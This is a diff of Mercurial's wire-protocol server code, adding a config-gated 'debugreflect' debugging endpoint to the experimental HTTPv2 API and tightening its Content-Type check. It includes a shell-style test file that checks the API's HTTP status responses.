220 221 """Handle requests to /api/*."""
221 222 assert req.dispatchparts[0] == b'api'
222 223
223 224 repo = rctx.repo
224 225
225 226 # This whole URL space is experimental for now. But we want to
226 227 # reserve the URL space. So, 404 all URLs if the feature isn't enabled.
227 228 if not repo.ui.configbool('experimental', 'web.apiserver'):
228 229 res.status = b'404 Not Found'
229 230 res.headers[b'Content-Type'] = b'text/plain'
230 231 res.setbodybytes(_('Experimental API server endpoint not enabled'))
231 232 return
232 233
233 234 # The URL space is /api/<protocol>/*. The structure of URLs under varies
234 235 # by <protocol>.
235 236
236 237 # Registered APIs are made available via config options of the name of
237 238 # the protocol.
238 239 availableapis = set()
239 240 for k, v in API_HANDLERS.items():
240 241 section, option = v['config']
241 242 if repo.ui.configbool(section, option):
242 243 availableapis.add(k)
243 244
244 245 # Requests to /api/ list available APIs.
245 246 if req.dispatchparts == [b'api']:
246 247 res.status = b'200 OK'
247 248 res.headers[b'Content-Type'] = b'text/plain'
248 249 lines = [_('APIs can be accessed at /api/<name>, where <name> can be '
249 250 'one of the following:\n')]
250 251 if availableapis:
251 252 lines.extend(sorted(availableapis))
252 253 else:
253 254 lines.append(_('(no available APIs)\n'))
254 255 res.setbodybytes(b'\n'.join(lines))
255 256 return
256 257
257 258 proto = req.dispatchparts[1]
258 259
259 260 if proto not in API_HANDLERS:
260 261 res.status = b'404 Not Found'
261 262 res.headers[b'Content-Type'] = b'text/plain'
262 263 res.setbodybytes(_('Unknown API: %s\nKnown APIs: %s') % (
263 264 proto, b', '.join(sorted(availableapis))))
264 265 return
265 266
266 267 if proto not in availableapis:
267 268 res.status = b'404 Not Found'
268 269 res.headers[b'Content-Type'] = b'text/plain'
269 270 res.setbodybytes(_('API %s not enabled\n') % proto)
270 271 return
271 272
272 273 API_HANDLERS[proto]['handler'](rctx, req, res, checkperm,
273 274 req.dispatchparts[2:])
274 275
275 276 def _handlehttpv2request(rctx, req, res, checkperm, urlparts):
276 277 from .hgweb import common as hgwebcommon
277 278
278 279 # URL space looks like: <permissions>/<command>, where <permission> can
279 280 # be ``ro`` or ``rw`` to signal read-only or read-write, respectively.
280 281
281 282 # Root URL does nothing meaningful... yet.
282 283 if not urlparts:
283 284 res.status = b'200 OK'
284 285 res.headers[b'Content-Type'] = b'text/plain'
285 286 res.setbodybytes(_('HTTP version 2 API handler'))
286 287 return
287 288
288 289 if len(urlparts) == 1:
289 290 res.status = b'404 Not Found'
290 291 res.headers[b'Content-Type'] = b'text/plain'
291 292 res.setbodybytes(_('do not know how to process %s\n') %
292 293 req.dispatchpath)
293 294 return
294 295
295 296 permission, command = urlparts[0:2]
296 297
297 298 if permission not in (b'ro', b'rw'):
298 299 res.status = b'404 Not Found'
299 300 res.headers[b'Content-Type'] = b'text/plain'
300 301 res.setbodybytes(_('unknown permission: %s') % permission)
301 302 return
302 303
303 304 if req.method != 'POST':
304 305 res.status = b'405 Method Not Allowed'
305 306 res.headers[b'Allow'] = b'POST'
306 307 res.setbodybytes(_('commands require POST requests'))
307 308 return
308 309
309 310 # At some point we'll want to use our own API instead of recycling the
310 311 # behavior of version 1 of the wire protocol...
311 312 # TODO return reasonable responses - not responses that overload the
312 313 # HTTP status line message for error reporting.
313 314 try:
314 315 checkperm(rctx, req, 'pull' if permission == b'ro' else 'push')
315 316 except hgwebcommon.ErrorResponse as e:
316 317 res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e))
317 318 for k, v in e.headers:
318 319 res.headers[k] = v
319 320 res.setbodybytes('permission denied')
320 321 return
321 322
323 # We have a special endpoint to reflect the request back at the client.
324 if command == b'debugreflect':
325 _processhttpv2reflectrequest(rctx.repo.ui, rctx.repo, req, res)
326 return
327
322 328 if command not in wireproto.commands:
323 329 res.status = b'404 Not Found'
324 330 res.headers[b'Content-Type'] = b'text/plain'
325 331 res.setbodybytes(_('unknown wire protocol command: %s\n') % command)
326 332 return
327 333
328 334 repo = rctx.repo
329 335 ui = repo.ui
330 336
331 337 proto = httpv2protocolhandler(req, ui)
332 338
333 339 if not wireproto.commands.commandavailable(command, proto):
334 340 res.status = b'404 Not Found'
335 341 res.headers[b'Content-Type'] = b'text/plain'
336 342 res.setbodybytes(_('invalid wire protocol command: %s') % command)
337 343 return
338 344
339 345 if req.headers.get(b'Accept') != FRAMINGTYPE:
340 346 res.status = b'406 Not Acceptable'
341 347 res.headers[b'Content-Type'] = b'text/plain'
342 348 res.setbodybytes(_('client MUST specify Accept header with value: %s\n')
343 349 % FRAMINGTYPE)
344 350 return
345 351
346 if (b'Content-Type' in req.headers
347 and req.headers[b'Content-Type'] != FRAMINGTYPE):
352 if req.headers.get(b'Content-Type') != FRAMINGTYPE:
348 353 res.status = b'415 Unsupported Media Type'
349 354 # TODO we should send a response with appropriate media type,
350 355 # since client does Accept it.
351 356 res.headers[b'Content-Type'] = b'text/plain'
352 357 res.setbodybytes(_('client MUST send Content-Type header with '
353 358 'value: %s\n') % FRAMINGTYPE)
354 359 return
355 360
356 361 # We don't do anything meaningful yet.
357 362 res.status = b'200 OK'
358 363 res.headers[b'Content-Type'] = b'text/plain'
359 364 res.setbodybytes(b'/'.join(urlparts) + b'\n')
360 365
366 def _processhttpv2reflectrequest(ui, repo, req, res):
367 """Reads unified frame protocol request and dumps out state to client.
368
369 This special endpoint can be used to help debug the wire protocol.
370
371 Instead of routing the request through the normal dispatch mechanism,
372 we instead read all frames, decode them, and feed them into our state
373 tracker. We then dump the log of all that activity back out to the
374 client.
375 """
376 import json
377
378 # Reflection APIs have a history of being abused, accidentally disclosing
379 # sensitive data, etc. So we have a config knob.
380 if not ui.configbool('experimental', 'web.api.debugreflect'):
381 res.status = b'404 Not Found'
382 res.headers[b'Content-Type'] = b'text/plain'
383 res.setbodybytes(_('debugreflect service not available'))
384 return
385
386 # We assume we have a unified framing protocol request body.
387
388 reactor = wireprotoframing.serverreactor()
389 states = []
390
391 while True:
392 frame = wireprotoframing.readframe(req.bodyfh)
393
394 if not frame:
395 states.append(b'received: <no frame>')
396 break
397
398 frametype, frameflags, payload = frame
399 states.append(b'received: %d %d %s' % (frametype, frameflags, payload))
400
401 action, meta = reactor.onframerecv(frametype, frameflags, payload)
402 states.append(json.dumps((action, meta), sort_keys=True,
403 separators=(', ', ': ')))
404
405 res.status = b'200 OK'
406 res.headers[b'Content-Type'] = b'text/plain'
407 res.setbodybytes(b'\n'.join(states))
408
361 409 # Maps API name to metadata so custom API can be registered.
362 410 API_HANDLERS = {
363 411 HTTPV2: {
364 412 'config': ('experimental', 'web.api.http-v2'),
365 413 'handler': _handlehttpv2request,
366 414 },
367 415 }
368 416
369 417 class httpv2protocolhandler(wireprototypes.baseprotocolhandler):
370 418 def __init__(self, req, ui):
371 419 self._req = req
372 420 self._ui = ui
373 421
374 422 @property
375 423 def name(self):
376 424 return HTTPV2
377 425
378 426 def getargs(self, args):
379 427 raise NotImplementedError
380 428
381 429 def forwardpayload(self, fp):
382 430 raise NotImplementedError
383 431
384 432 @contextlib.contextmanager
385 433 def mayberedirectstdio(self):
386 434 raise NotImplementedError
387 435
388 436 def client(self):
389 437 raise NotImplementedError
390 438
391 439 def addcapabilities(self, repo, caps):
392 440 raise NotImplementedError
393 441
394 442 def checkperm(self, perm):
395 443 raise NotImplementedError
396 444
397 445 def _httpresponsetype(ui, req, prefer_uncompressed):
398 446 """Determine the appropriate response type and compression settings.
399 447
400 448 Returns a tuple of (mediatype, compengine, engineopts).
401 449 """
402 450 # Determine the response media type and compression engine based
403 451 # on the request parameters.
404 452 protocaps = decodevaluefromheaders(req, 'X-HgProto').split(' ')
405 453
406 454 if '0.2' in protocaps:
407 455 # All clients are expected to support uncompressed data.
408 456 if prefer_uncompressed:
409 457 return HGTYPE2, util._noopengine(), {}
410 458
411 459 # Default as defined by wire protocol spec.
412 460 compformats = ['zlib', 'none']
413 461 for cap in protocaps:
414 462 if cap.startswith('comp='):
415 463 compformats = cap[5:].split(',')
416 464 break
417 465
418 466 # Now find an agreed upon compression format.
419 467 for engine in wireproto.supportedcompengines(ui, util.SERVERROLE):
420 468 if engine.wireprotosupport().name in compformats:
421 469 opts = {}
422 470 level = ui.configint('server', '%slevel' % engine.name())
423 471 if level is not None:
424 472 opts['level'] = level
425 473
426 474 return HGTYPE2, engine, opts
427 475
428 476 # No mutually supported compression format. Fall back to the
429 477 # legacy protocol.
430 478
431 479 # Don't allow untrusted settings because disabling compression or
432 480 # setting a very high compression level could lead to flooding
433 481 # the server's network or CPU.
434 482 opts = {'level': ui.configint('server', 'zliblevel')}
435 483 return HGTYPE, util.compengines['zlib'], opts
436 484
437 485 def _callhttp(repo, req, res, proto, cmd):
438 486 # Avoid cycle involving hg module.
439 487 from .hgweb import common as hgwebcommon
440 488
441 489 def genversion2(gen, engine, engineopts):
442 490 # application/mercurial-0.2 always sends a payload header
443 491 # identifying the compression engine.
444 492 name = engine.wireprotosupport().name
445 493 assert 0 < len(name) < 256
446 494 yield struct.pack('B', len(name))
447 495 yield name
448 496
449 497 for chunk in gen:
450 498 yield chunk
451 499
452 500 def setresponse(code, contenttype, bodybytes=None, bodygen=None):
453 501 if code == HTTP_OK:
454 502 res.status = '200 Script output follows'
455 503 else:
456 504 res.status = hgwebcommon.statusmessage(code)
457 505
458 506 res.headers['Content-Type'] = contenttype
459 507
460 508 if bodybytes is not None:
461 509 res.setbodybytes(bodybytes)
462 510 if bodygen is not None:
463 511 res.setbodygen(bodygen)
464 512
465 513 if not wireproto.commands.commandavailable(cmd, proto):
466 514 setresponse(HTTP_OK, HGERRTYPE,
467 515 _('requested wire protocol command is not available over '
468 516 'HTTP'))
469 517 return
470 518
471 519 proto.checkperm(wireproto.commands[cmd].permission)
472 520
473 521 rsp = wireproto.dispatch(repo, proto, cmd)
474 522
475 523 if isinstance(rsp, bytes):
476 524 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
477 525 elif isinstance(rsp, wireprototypes.bytesresponse):
478 526 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp.data)
479 527 elif isinstance(rsp, wireprototypes.streamreslegacy):
480 528 setresponse(HTTP_OK, HGTYPE, bodygen=rsp.gen)
481 529 elif isinstance(rsp, wireprototypes.streamres):
482 530 gen = rsp.gen
483 531
484 532 # This code for compression should not be streamres specific. It
485 533 # is here because we only compress streamres at the moment.
486 534 mediatype, engine, engineopts = _httpresponsetype(
487 535 repo.ui, req, rsp.prefer_uncompressed)
488 536 gen = engine.compressstream(gen, engineopts)
489 537
490 538 if mediatype == HGTYPE2:
491 539 gen = genversion2(gen, engine, engineopts)
492 540
493 541 setresponse(HTTP_OK, mediatype, bodygen=gen)
494 542 elif isinstance(rsp, wireprototypes.pushres):
495 543 rsp = '%d\n%s' % (rsp.res, rsp.output)
496 544 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
497 545 elif isinstance(rsp, wireprototypes.pusherr):
498 546 rsp = '0\n%s\n' % rsp.res
499 547 res.drain = True
500 548 setresponse(HTTP_OK, HGTYPE, bodybytes=rsp)
501 549 elif isinstance(rsp, wireprototypes.ooberror):
502 550 setresponse(HTTP_OK, HGERRTYPE, bodybytes=rsp.message)
503 551 else:
504 552 raise error.ProgrammingError('hgweb.protocol internal failure', rsp)
505 553
506 554 def _sshv1respondbytes(fout, value):
507 555 """Send a bytes response for protocol version 1."""
508 556 fout.write('%d\n' % len(value))
509 557 fout.write(value)
510 558 fout.flush()
511 559
512 560 def _sshv1respondstream(fout, source):
513 561 write = fout.write
514 562 for chunk in source.gen:
515 563 write(chunk)
516 564 fout.flush()
517 565
518 566 def _sshv1respondooberror(fout, ferr, rsp):
519 567 ferr.write(b'%s\n-\n' % rsp)
520 568 ferr.flush()
521 569 fout.write(b'\n')
522 570 fout.flush()
523 571
524 572 class sshv1protocolhandler(wireprototypes.baseprotocolhandler):
525 573 """Handler for requests services via version 1 of SSH protocol."""
526 574 def __init__(self, ui, fin, fout):
527 575 self._ui = ui
528 576 self._fin = fin
529 577 self._fout = fout
530 578
531 579 @property
532 580 def name(self):
533 581 return wireprototypes.SSHV1
534 582
535 583 def getargs(self, args):
536 584 data = {}
537 585 keys = args.split()
538 586 for n in xrange(len(keys)):
539 587 argline = self._fin.readline()[:-1]
540 588 arg, l = argline.split()
541 589 if arg not in keys:
542 590 raise error.Abort(_("unexpected parameter %r") % arg)
543 591 if arg == '*':
544 592 star = {}
545 593 for k in xrange(int(l)):
546 594 argline = self._fin.readline()[:-1]
547 595 arg, l = argline.split()
548 596 val = self._fin.read(int(l))
549 597 star[arg] = val
550 598 data['*'] = star
551 599 else:
552 600 val = self._fin.read(int(l))
553 601 data[arg] = val
554 602 return [data[k] for k in keys]
555 603
556 604 def forwardpayload(self, fpout):
557 605 # We initially send an empty response. This tells the client it is
558 606 # OK to start sending data. If a client sees any other response, it
559 607 # interprets it as an error.
560 608 _sshv1respondbytes(self._fout, b'')
561 609
562 610 # The file is in the form:
563 611 #
564 612 # <chunk size>\n<chunk>
565 613 # ...
566 614 # 0\n
567 615 count = int(self._fin.readline())
568 616 while count:
569 617 fpout.write(self._fin.read(count))
570 618 count = int(self._fin.readline())
571 619
572 620 @contextlib.contextmanager
573 621 def mayberedirectstdio(self):
574 622 yield None
575 623
576 624 def client(self):
577 625 client = encoding.environ.get('SSH_CLIENT', '').split(' ', 1)[0]
578 626 return 'remote:ssh:' + client
579 627
580 628 def addcapabilities(self, repo, caps):
581 629 return caps
582 630
583 631 def checkperm(self, perm):
584 632 pass
585 633
586 634 class sshv2protocolhandler(sshv1protocolhandler):
587 635 """Protocol handler for version 2 of the SSH protocol."""
588 636
589 637 @property
590 638 def name(self):
591 639 return wireprototypes.SSHV2
592 640
593 641 def _runsshserver(ui, repo, fin, fout, ev):
594 642 # This function operates like a state machine of sorts. The following
595 643 # states are defined:
596 644 #
597 645 # protov1-serving
598 646 # Server is in protocol version 1 serving mode. Commands arrive on
599 647 # new lines. These commands are processed in this state, one command
600 648 # after the other.
601 649 #
602 650 # protov2-serving
603 651 # Server is in protocol version 2 serving mode.
604 652 #
605 653 # upgrade-initial
606 654 # The server is going to process an upgrade request.
607 655 #
608 656 # upgrade-v2-filter-legacy-handshake
609 657 # The protocol is being upgraded to version 2. The server is expecting
610 658 # the legacy handshake from version 1.
611 659 #
612 660 # upgrade-v2-finish
613 661 # The upgrade to version 2 of the protocol is imminent.
614 662 #
615 663 # shutdown
616 664 # The server is shutting down, possibly in reaction to a client event.
617 665 #
618 666 # And here are their transitions:
619 667 #
620 668 # protov1-serving -> shutdown
621 669 # When server receives an empty request or encounters another
622 670 # error.
623 671 #
624 672 # protov1-serving -> upgrade-initial
625 673 # An upgrade request line was seen.
626 674 #
627 675 # upgrade-initial -> upgrade-v2-filter-legacy-handshake
628 676 # Upgrade to version 2 in progress. Server is expecting to
629 677 # process a legacy handshake.
630 678 #
631 679 # upgrade-v2-filter-legacy-handshake -> shutdown
632 680 # Client did not fulfill upgrade handshake requirements.
633 681 #
634 682 # upgrade-v2-filter-legacy-handshake -> upgrade-v2-finish
635 683 # Client fulfilled version 2 upgrade requirements. Finishing that
636 684 # upgrade.
637 685 #
638 686 # upgrade-v2-finish -> protov2-serving
639 687 # Protocol upgrade to version 2 complete. Server can now speak protocol
640 688 # version 2.
641 689 #
642 690 # protov2-serving -> protov1-serving
643 691 # Ths happens by default since protocol version 2 is the same as
644 692 # version 1 except for the handshake.
645 693
646 694 state = 'protov1-serving'
647 695 proto = sshv1protocolhandler(ui, fin, fout)
648 696 protoswitched = False
649 697
650 698 while not ev.is_set():
651 699 if state == 'protov1-serving':
652 700 # Commands are issued on new lines.
653 701 request = fin.readline()[:-1]
654 702
655 703 # Empty lines signal to terminate the connection.
656 704 if not request:
657 705 state = 'shutdown'
658 706 continue
659 707
660 708 # It looks like a protocol upgrade request. Transition state to
661 709 # handle it.
662 710 if request.startswith(b'upgrade '):
663 711 if protoswitched:
664 712 _sshv1respondooberror(fout, ui.ferr,
665 713 b'cannot upgrade protocols multiple '
666 714 b'times')
667 715 state = 'shutdown'
668 716 continue
669 717
670 718 state = 'upgrade-initial'
671 719 continue
672 720
673 721 available = wireproto.commands.commandavailable(request, proto)
674 722
675 723 # This command isn't available. Send an empty response and go
676 724 # back to waiting for a new command.
677 725 if not available:
678 726 _sshv1respondbytes(fout, b'')
679 727 continue
680 728
681 729 rsp = wireproto.dispatch(repo, proto, request)
682 730
683 731 if isinstance(rsp, bytes):
684 732 _sshv1respondbytes(fout, rsp)
685 733 elif isinstance(rsp, wireprototypes.bytesresponse):
686 734 _sshv1respondbytes(fout, rsp.data)
687 735 elif isinstance(rsp, wireprototypes.streamres):
688 736 _sshv1respondstream(fout, rsp)
689 737 elif isinstance(rsp, wireprototypes.streamreslegacy):
690 738 _sshv1respondstream(fout, rsp)
691 739 elif isinstance(rsp, wireprototypes.pushres):
692 740 _sshv1respondbytes(fout, b'')
693 741 _sshv1respondbytes(fout, b'%d' % rsp.res)
694 742 elif isinstance(rsp, wireprototypes.pusherr):
695 743 _sshv1respondbytes(fout, rsp.res)
696 744 elif isinstance(rsp, wireprototypes.ooberror):
697 745 _sshv1respondooberror(fout, ui.ferr, rsp.message)
698 746 else:
699 747 raise error.ProgrammingError('unhandled response type from '
700 748 'wire protocol command: %s' % rsp)
701 749
702 750 # For now, protocol version 2 serving just goes back to version 1.
703 751 elif state == 'protov2-serving':
704 752 state = 'protov1-serving'
705 753 continue
706 754
707 755 elif state == 'upgrade-initial':
708 756 # We should never transition into this state if we've switched
709 757 # protocols.
710 758 assert not protoswitched
711 759 assert proto.name == wireprototypes.SSHV1
712 760
713 761 # Expected: upgrade <token> <capabilities>
714 762 # If we get something else, the request is malformed. It could be
715 763 # from a future client that has altered the upgrade line content.
716 764 # We treat this as an unknown command.
717 765 try:
718 766 token, caps = request.split(b' ')[1:]
719 767 except ValueError:
720 768 _sshv1respondbytes(fout, b'')
721 769 state = 'protov1-serving'
722 770 continue
723 771
724 772 # Send empty response if we don't support upgrading protocols.
725 773 if not ui.configbool('experimental', 'sshserver.support-v2'):
726 774 _sshv1respondbytes(fout, b'')
727 775 state = 'protov1-serving'
728 776 continue
729 777
730 778 try:
731 779 caps = urlreq.parseqs(caps)
732 780 except ValueError:
733 781 _sshv1respondbytes(fout, b'')
734 782 state = 'protov1-serving'
735 783 continue
736 784
737 785 # We don't see an upgrade request to protocol version 2. Ignore
738 786 # the upgrade request.
739 787 wantedprotos = caps.get(b'proto', [b''])[0]
740 788 if SSHV2 not in wantedprotos:
741 789 _sshv1respondbytes(fout, b'')
742 790 state = 'protov1-serving'
743 791 continue
744 792
745 793 # It looks like we can honor this upgrade request to protocol 2.
746 794 # Filter the rest of the handshake protocol request lines.
747 795 state = 'upgrade-v2-filter-legacy-handshake'
748 796 continue
749 797
750 798 elif state == 'upgrade-v2-filter-legacy-handshake':
751 799 # Client should have sent legacy handshake after an ``upgrade``
752 800 # request. Expected lines:
753 801 #
754 802 # hello
755 803 # between
756 804 # pairs 81
757 805 # 0000...-0000...
758 806
759 807 ok = True
760 808 for line in (b'hello', b'between', b'pairs 81'):
761 809 request = fin.readline()[:-1]
762 810
763 811 if request != line:
764 812 _sshv1respondooberror(fout, ui.ferr,
765 813 b'malformed handshake protocol: '
766 814 b'missing %s' % line)
767 815 ok = False
768 816 state = 'shutdown'
769 817 break
770 818
771 819 if not ok:
772 820 continue
773 821
774 822 request = fin.read(81)
775 823 if request != b'%s-%s' % (b'0' * 40, b'0' * 40):
776 824 _sshv1respondooberror(fout, ui.ferr,
777 825 b'malformed handshake protocol: '
778 826 b'missing between argument value')
779 827 state = 'shutdown'
780 828 continue
781 829
782 830 state = 'upgrade-v2-finish'
783 831 continue
784 832
785 833 elif state == 'upgrade-v2-finish':
786 834 # Send the upgrade response.
787 835 fout.write(b'upgraded %s %s\n' % (token, SSHV2))
788 836 servercaps = wireproto.capabilities(repo, proto)
789 837 rsp = b'capabilities: %s' % servercaps.data
790 838 fout.write(b'%d\n%s\n' % (len(rsp), rsp))
791 839 fout.flush()
792 840
793 841 proto = sshv2protocolhandler(ui, fin, fout)
794 842 protoswitched = True
795 843
796 844 state = 'protov2-serving'
797 845 continue
798 846
799 847 elif state == 'shutdown':
800 848 break
801 849
802 850 else:
803 851 raise error.ProgrammingError('unhandled ssh server state: %s' %
804 852 state)
805 853
806 854 class sshserver(object):
807 855 def __init__(self, ui, repo, logfh=None):
808 856 self._ui = ui
809 857 self._repo = repo
810 858 self._fin = ui.fin
811 859 self._fout = ui.fout
812 860
813 861 # Log write I/O to stdout and stderr if configured.
814 862 if logfh:
815 863 self._fout = util.makeloggingfileobject(
816 864 logfh, self._fout, 'o', logdata=True)
817 865 ui.ferr = util.makeloggingfileobject(
818 866 logfh, ui.ferr, 'e', logdata=True)
819 867
820 868 hook.redirect(True)
821 869 ui.fout = repo.ui.fout = ui.ferr
822 870
823 871 # Prevent insertion/deletion of CRs
824 872 util.setbinary(self._fin)
825 873 util.setbinary(self._fout)
826 874
827 875 def serve_forever(self):
828 876 self.serveuntil(threading.Event())
829 877 sys.exit(0)
830 878
831 879 def serveuntil(self, ev):
832 880 """Serve until a threading.Event is set."""
833 881 _runsshserver(self._ui, self._repo, self._fin, self._fout, ev)
@@ -1,331 +1,406 b''
1 1 $ HTTPV2=exp-http-v2-0001
2 2 $ MEDIATYPE=application/mercurial-exp-framing-0001
3 3
4 4 $ send() {
5 5 > hg --verbose debugwireproto --peer raw http://$LOCALIP:$HGPORT/
6 6 > }
7 7
8 8 $ cat > dummycommands.py << EOF
9 9 > from mercurial import wireprototypes, wireproto
10 10 > @wireproto.wireprotocommand('customreadonly', permission='pull')
11 11 > def customreadonly(repo, proto):
12 12 > return wireprototypes.bytesresponse(b'customreadonly bytes response')
13 13 > @wireproto.wireprotocommand('customreadwrite', permission='push')
14 14 > def customreadwrite(repo, proto):
15 15 > return wireprototypes.bytesresponse(b'customreadwrite bytes response')
16 16 > EOF
17 17
18 18 $ cat >> $HGRCPATH << EOF
19 19 > [extensions]
20 20 > dummycommands = $TESTTMP/dummycommands.py
21 21 > EOF
22 22
23 23 $ hg init server
24 24 $ cat > server/.hg/hgrc << EOF
25 25 > [experimental]
26 26 > web.apiserver = true
27 27 > EOF
28 28 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
29 29 $ cat hg.pid > $DAEMON_PIDS
30 30
31 31 HTTP v2 protocol not enabled by default
32 32
33 33 $ send << EOF
34 34 > httprequest GET api/$HTTPV2
35 35 > user-agent: test
36 36 > EOF
37 37 using raw connection to peer
38 38 s> GET /api/exp-http-v2-0001 HTTP/1.1\r\n
39 39 s> Accept-Encoding: identity\r\n
40 40 s> user-agent: test\r\n
41 41 s> host: $LOCALIP:$HGPORT\r\n (glob)
42 42 s> \r\n
43 43 s> makefile('rb', None)
44 44 s> HTTP/1.1 404 Not Found\r\n
45 45 s> Server: testing stub value\r\n
46 46 s> Date: $HTTP_DATE$\r\n
47 47 s> Content-Type: text/plain\r\n
48 48 s> Content-Length: 33\r\n
49 49 s> \r\n
50 50 s> API exp-http-v2-0001 not enabled\n
51 51
52 52 Restart server with support for HTTP v2 API
53 53
54 54 $ killdaemons.py
55 55 $ cat > server/.hg/hgrc << EOF
56 56 > [experimental]
57 57 > web.apiserver = true
58 58 > web.api.http-v2 = true
59 59 > EOF
60 60
61 61 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
62 62 $ cat hg.pid > $DAEMON_PIDS
63 63
64 64 Request to unknown command yields 404
65 65
66 66 $ send << EOF
67 67 > httprequest POST api/$HTTPV2/ro/badcommand
68 68 > user-agent: test
69 69 > EOF
70 70 using raw connection to peer
71 71 s> POST /api/exp-http-v2-0001/ro/badcommand HTTP/1.1\r\n
72 72 s> Accept-Encoding: identity\r\n
73 73 s> user-agent: test\r\n
74 74 s> host: $LOCALIP:$HGPORT\r\n (glob)
75 75 s> \r\n
76 76 s> makefile('rb', None)
77 77 s> HTTP/1.1 404 Not Found\r\n
78 78 s> Server: testing stub value\r\n
79 79 s> Date: $HTTP_DATE$\r\n
80 80 s> Content-Type: text/plain\r\n
81 81 s> Content-Length: 42\r\n
82 82 s> \r\n
83 83 s> unknown wire protocol command: badcommand\n
84 84
85 85 GET to read-only command yields a 405
86 86
87 87 $ send << EOF
88 88 > httprequest GET api/$HTTPV2/ro/customreadonly
89 89 > user-agent: test
90 90 > EOF
91 91 using raw connection to peer
92 92 s> GET /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
93 93 s> Accept-Encoding: identity\r\n
94 94 s> user-agent: test\r\n
95 95 s> host: $LOCALIP:$HGPORT\r\n (glob)
96 96 s> \r\n
97 97 s> makefile('rb', None)
98 98 s> HTTP/1.1 405 Method Not Allowed\r\n
99 99 s> Server: testing stub value\r\n
100 100 s> Date: $HTTP_DATE$\r\n
101 101 s> Allow: POST\r\n
102 102 s> Content-Length: 30\r\n
103 103 s> \r\n
104 104 s> commands require POST requests
105 105
106 106 Missing Accept header results in 406
107 107
108 108 $ send << EOF
109 109 > httprequest POST api/$HTTPV2/ro/customreadonly
110 110 > user-agent: test
111 111 > EOF
112 112 using raw connection to peer
113 113 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
114 114 s> Accept-Encoding: identity\r\n
115 115 s> user-agent: test\r\n
116 116 s> host: $LOCALIP:$HGPORT\r\n (glob)
117 117 s> \r\n
118 118 s> makefile('rb', None)
119 119 s> HTTP/1.1 406 Not Acceptable\r\n
120 120 s> Server: testing stub value\r\n
121 121 s> Date: $HTTP_DATE$\r\n
122 122 s> Content-Type: text/plain\r\n
123 123 s> Content-Length: 85\r\n
124 124 s> \r\n
125 125 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
126 126
127 127 Bad Accept header results in 406
128 128
129 129 $ send << EOF
130 130 > httprequest POST api/$HTTPV2/ro/customreadonly
131 131 > accept: invalid
132 132 > user-agent: test
133 133 > EOF
134 134 using raw connection to peer
135 135 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
136 136 s> Accept-Encoding: identity\r\n
137 137 s> accept: invalid\r\n
138 138 s> user-agent: test\r\n
139 139 s> host: $LOCALIP:$HGPORT\r\n (glob)
140 140 s> \r\n
141 141 s> makefile('rb', None)
142 142 s> HTTP/1.1 406 Not Acceptable\r\n
143 143 s> Server: testing stub value\r\n
144 144 s> Date: $HTTP_DATE$\r\n
145 145 s> Content-Type: text/plain\r\n
146 146 s> Content-Length: 85\r\n
147 147 s> \r\n
148 148 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
149 149
150 150 Bad Content-Type header results in 415
151 151
152 152 $ send << EOF
153 153 > httprequest POST api/$HTTPV2/ro/customreadonly
154 154 > accept: $MEDIATYPE
155 155 > user-agent: test
156 156 > content-type: badmedia
157 157 > EOF
158 158 using raw connection to peer
159 159 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
160 160 s> Accept-Encoding: identity\r\n
161 161 s> accept: application/mercurial-exp-framing-0001\r\n
162 162 s> content-type: badmedia\r\n
163 163 s> user-agent: test\r\n
164 164 s> host: $LOCALIP:$HGPORT\r\n (glob)
165 165 s> \r\n
166 166 s> makefile('rb', None)
167 167 s> HTTP/1.1 415 Unsupported Media Type\r\n
168 168 s> Server: testing stub value\r\n
169 169 s> Date: $HTTP_DATE$\r\n
170 170 s> Content-Type: text/plain\r\n
171 171 s> Content-Length: 88\r\n
172 172 s> \r\n
173 173 s> client MUST send Content-Type header with value: application/mercurial-exp-framing-0001\n
174 174
175 175 Request to read-only command works out of the box
176 176
177 177 $ send << EOF
178 178 > httprequest POST api/$HTTPV2/ro/customreadonly
179 179 > accept: $MEDIATYPE
180 180 > content-type: $MEDIATYPE
181 181 > user-agent: test
182 182 > frame command-name eos customreadonly
183 183 > EOF
184 184 using raw connection to peer
185 185 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
186 186 s> Accept-Encoding: identity\r\n
187 187 s> accept: application/mercurial-exp-framing-0001\r\n
188 188 s> content-type: application/mercurial-exp-framing-0001\r\n
189 189 s> user-agent: test\r\n
190 190 s> content-length: 18\r\n
191 191 s> host: $LOCALIP:$HGPORT\r\n (glob)
192 192 s> \r\n
193 193 s> \x0e\x00\x00\x11customreadonly
194 194 s> makefile('rb', None)
195 195 s> HTTP/1.1 200 OK\r\n
196 196 s> Server: testing stub value\r\n
197 197 s> Date: $HTTP_DATE$\r\n
198 198 s> Content-Type: text/plain\r\n
199 199 s> Content-Length: 18\r\n
200 200 s> \r\n
201 201 s> ro/customreadonly\n
202 202
203 203 Request to read-write command fails because server is read-only by default
204 204
205 205 GET to read-write request yields 405
206 206
207 207 $ send << EOF
208 208 > httprequest GET api/$HTTPV2/rw/customreadonly
209 209 > user-agent: test
210 210 > EOF
211 211 using raw connection to peer
212 212 s> GET /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
213 213 s> Accept-Encoding: identity\r\n
214 214 s> user-agent: test\r\n
215 215 s> host: $LOCALIP:$HGPORT\r\n (glob)
216 216 s> \r\n
217 217 s> makefile('rb', None)
218 218 s> HTTP/1.1 405 Method Not Allowed\r\n
219 219 s> Server: testing stub value\r\n
220 220 s> Date: $HTTP_DATE$\r\n
221 221 s> Allow: POST\r\n
222 222 s> Content-Length: 30\r\n
223 223 s> \r\n
224 224 s> commands require POST requests
225 225
226 226 Even for unknown commands
227 227
228 228 $ send << EOF
229 229 > httprequest GET api/$HTTPV2/rw/badcommand
230 230 > user-agent: test
231 231 > EOF
232 232 using raw connection to peer
233 233 s> GET /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
234 234 s> Accept-Encoding: identity\r\n
235 235 s> user-agent: test\r\n
